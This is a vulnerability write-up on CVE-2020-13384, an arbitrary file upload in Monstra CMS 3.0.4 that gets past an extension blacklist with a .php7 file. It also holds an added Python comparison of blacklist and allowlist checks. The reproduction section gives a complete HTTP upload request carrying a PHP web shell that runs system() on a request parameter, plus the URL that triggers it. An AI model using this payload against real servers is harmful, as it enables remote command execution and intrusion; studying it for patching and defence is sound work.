Monstra file upload (CVE-2020-13384)
- Monstra file upload (CVE-2020-13384)
- 0x01 Vulnerability description
- 0x02 Affected versions
- 0x03 Reproduction
- 0x04 Fix
All articles are for security research and learning only; you bear the consequences yourself!
Monstra CMS is a modern, lightweight content management system built on PHP and XML. The whole system runs without a database, and it is said to have been developed by a Ukrainian company.
0x01 Vulnerability description
Monstra CMS 3.0.4 contains a security vulnerability caused by the program failing to validate file extensions correctly. An attacker can upload a file with a special extension and execute arbitrary PHP code. Account credentials: admin/123456
The program rejects uploads whose extension is one of the following: 'html', 'htm', 'js', 'jsb', 'mhtml', 'mht', 'php', 'phtml', 'php3', 'php4', 'php5', 'phps', 'shtml', 'jhtml', 'pl', 'py', 'cgi', 'sh', 'ksh', 'bsh', 'c', 'htaccess', 'htpasswd', 'exe', 'scr', 'dll', 'msi', 'vbs', 'bat', 'com', 'pif', 'cmd', 'vxd', 'cpl', 'empty'. Any extension not on this blacklist is accepted.
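The following is an added example, not code from the article or from Monstra CMS. It models the blacklist check above using the exact list the article quotes, shows that a name such as shell.php7 passes it, and contrasts it with an allowlist check that only admits known-safe extensions. The allowlist contents and the function names are assumptions chosen for illustration.

```python
# Extension blacklist exactly as quoted in the article for Monstra CMS 3.0.4.
BLACKLIST = {
    'html', 'htm', 'js', 'jsb', 'mhtml', 'mht', 'php', 'phtml', 'php3', 'php4',
    'php5', 'phps', 'shtml', 'jhtml', 'pl', 'py', 'cgi', 'sh', 'ksh', 'bsh', 'c',
    'htaccess', 'htpasswd', 'exe', 'scr', 'dll', 'msi', 'vbs', 'bat', 'com',
    'pif', 'cmd', 'vxd', 'cpl', 'empty',
}

# Assumed allowlist for the hardened check; not taken from the project.
ALLOWLIST = {'jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt', 'zip'}


def extension_of(filename: str) -> str:
    """Return the lowercase text after the last dot, or '' if there is no dot.

    A plain rsplit is used so that a leading-dot name like '.htaccess'
    still yields 'htaccess' instead of an empty extension.
    """
    name = filename.replace('\\', '/').rsplit('/', 1)[-1]
    if '.' not in name:
        return ''
    return name.rsplit('.', 1)[-1].lower()


def blacklist_allows(filename: str) -> bool:
    """Vulnerable pattern: accept anything not explicitly forbidden.

    Because 'php7' is absent from the list, shell.php7 is accepted even
    though many PHP handler configurations execute that extension.
    """
    return extension_of(filename) not in BLACKLIST


def allowlist_allows(filename: str) -> bool:
    """Hardened pattern: accept only extensions known to be safe to serve."""
    ext = extension_of(filename)
    return ext != '' and ext in ALLOWLIST


def compare(filenames):
    """Run both checks over a list of names; returns {name: (blacklist, allowlist)}."""
    return {f: (blacklist_allows(f), allowlist_allows(f)) for f in filenames}


if __name__ == '__main__':
    # Constructed sample names; shell.php7 is the one the article uses.
    for name, (bl, al) in compare(['shell.php7', 'shell.php', 'photo.jpg']).items():
        print(f'{name:12} blacklist accepts={bl!s:5} allowlist accepts={al}')
```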
PoC
https://www.exploit-db.com/exploits/48479
0x02 Affected versions
3.0.4
0x03 Reproduction
- Go to: http://192.168.2.5/monstra/admin/index.php?id=filesmanager&path=uploads/
- Upload a one-liner shell with the php7 extension, i.e. shell.php7
The request is as follows:
POST /monstra/admin/index.php?id=filesmanager HTTP/1.1
Host: 192.168.2.5
Content-Length: 548
Cache-Control: max-age=0
Origin: http://192.168.2.5
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytRfyCkYq8NvztDBf
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.2.5/monstra/admin/index.php?id=filesmanager
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fr;q=0.7
Cookie: PHPSESSID=eej6e0lqi191k2frqc2hl3v6d0; _ga=GA1.1.405623579.1579949328; _gid=GA1.1.2042923722.1579949328
Connection: close

------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="csrf"

2e6ae2353998caa319aae262b113c6b3f17a9636
------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="file"; filename="shell.php7"
Content-Type: application/octet-stream

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="upload_file"

Upload
------WebKitFormBoundarytRfyCkYq8NvztDBf--
- Trigger your shell by visiting http://192.168.2.5/monstra/public/uploads/shell.php7?cmd=id
0x04 Fix
Upgrade to the latest version.
References
https://www.exploit-db.com/exploits/48479
https://xz.aliyun.com/t/7850